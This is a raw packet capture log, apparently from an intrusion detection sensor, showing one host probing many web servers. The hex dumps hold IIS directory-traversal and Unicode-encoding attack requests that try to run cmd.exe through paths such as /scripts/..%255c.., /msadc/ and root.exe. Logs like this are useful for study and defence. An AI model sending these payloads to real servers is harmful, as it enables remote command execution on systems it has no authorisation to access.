137.189.161.199:2127 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:62645 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1995  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.386681 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2127 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:62901 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1996  Ack: 0x317B6FA8  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.386705 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2127 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:63157 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372E1996  Ack: 0x317B6FA8  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  252f../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.390776 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2127 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:63413 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19F6  Ack: 0x317B718D  Win: 0xAA1C  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.390816 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2127 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:63669 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19F6  Ack: 0x31A6D8E7  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:52.501281 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2257 -> 137.189.99.11:80 TCP TTL:125 TOS:0x0 ID:22455 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1DFA  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:00.283037 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4941 -> 137.189.98.100:80 TCP TTL:125 TOS:0x0 ID:12756 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E3CB5  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:00.644661 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1041 -> 137.189.98.100:80 TCP TTL:125 TOS:0x0 ID:56276 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E3DC7  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:02.157721 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1260 -> 137.189.98.193:80 TCP TTL:125 TOS:0x0 ID:3799 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E43C7  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:19.597794 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3446 -> 137.189.97.198:80 TCP TTL:125 TOS:0x0 ID:3098 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E8825  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:27.961661 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1953 -> 137.189.99.49:80 TCP TTL:125 TOS:0x0 ID:47156 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA878  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.270828 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2030 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:39733 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA16  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.272506 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2030 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:41525 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA17  Ack: 0x674694BD  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.272854 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7E
137.189.161.199:2030 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:42037 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x372EAA17  Ack: 0x674694BD  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.275583 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2030 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:43573 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA5F  Ack: 0x6746968A  Win: 0xAA34  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.275783 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2030 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:43829 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA5F  Ack: 0x6746968A  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.277424 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2034 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:44597 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9E3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.280332 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2034 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:46389 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9E4  Ack: 0x6678F6DF  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.280506 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7C
137.189.161.199:2034 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:46645 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x372EA9E4  Ack: 0x6678F6DF  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E  GET /MSADC/root.
65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
73 65 0D 0A 0D 0A                                se....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.282789 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2034 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:47925 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA2A  Ack: 0x6678F8AA  Win: 0xAA36  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.283156 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2034 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:48949 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA2A  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.284264 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2039 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:49717 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9F3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.285903 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2039 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:50741 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9F4  Ack: 0x66FC2D8C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.285924 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:2039 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:50997 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372EA9F4  Ack: 0x66FC2D8C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.288196 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2039 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:53557 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA44  Ack: 0x66FC2F61  Win: 0xAA2C  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.289013 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2039 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:54325 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA44  Ack: 0x45CF2140  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.289834 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2045 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:55093 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9F3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.292125 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2045 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:56629 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9F4  Ack: 0x674CA73E  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.292310 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:2045 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:57397 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372EA9F4  Ack: 0x674CA73E  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.294421 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2045 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:58421 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA44  Ack: 0x674CA913  Win: 0xAA2C  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.295075 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2045 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:59189 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA44  Ack: 0x45D08D2D  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.295894 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2049 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:59701 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9E2  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.297246 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2049 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:60469 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9E3  Ack: 0x6670B83E  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.299726 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2049 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:60981 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372EA9E3  Ack: 0x6670B83E  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  255c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.307691 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2049 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:62517 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA43  Ack: 0x6670BA21  Win: 0xAA1E  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.310747 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2049 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:63285 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA43  Ack: 0x45D13D66  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.311612 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2052 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:63541 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9EF  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.316701 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2052 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:64053 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9F0  Ack: 0x672EE2B3  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.318857 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:2052 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:54 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372EA9F0  Ack: 0x672EE2B3  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E  GET /_vti_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.321005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2052 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:1590 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA65  Ack: 0x672EE4A7  Win: 0xAA0D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.321330 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2052 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:1846 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA65  Ack: 0x672EE4A7  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.322110 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2056 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:2358 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA4F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.336075 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2056 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:2870 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA50  Ack: 0x66F4C5BE  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.336552 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:2056 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:3382 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372EAA50  Ack: 0x66F4C5BE  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.340236 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2056 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:4662 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAAC5  Ack: 0x66F4C7B2  Win: 0xAA0D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.340238 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2056 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:4918 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAC5  Ack: 0x66F4C7B2  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.340336 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2059 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:5430 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA5F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.341771 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2059 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:6710 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA60  Ack: 0x66B2AC08  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.342005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xC7
137.189.161.199:2059 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:6966 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x372EAA60  Ack: 0x66B2AC08  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 32 35  GET /msadc/..%25
35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 2E  5c../..%255c../.
2E 25 32 35 35 63 2F 2E 2E 25 63 31 25 31 63 2E  .%255c/..%c1%1c.
2E 2F 2E 2E 25 63 31 25 31 63 2E 2E 2F 2E 2E 25  ./..%c1%1c../..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.344559 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
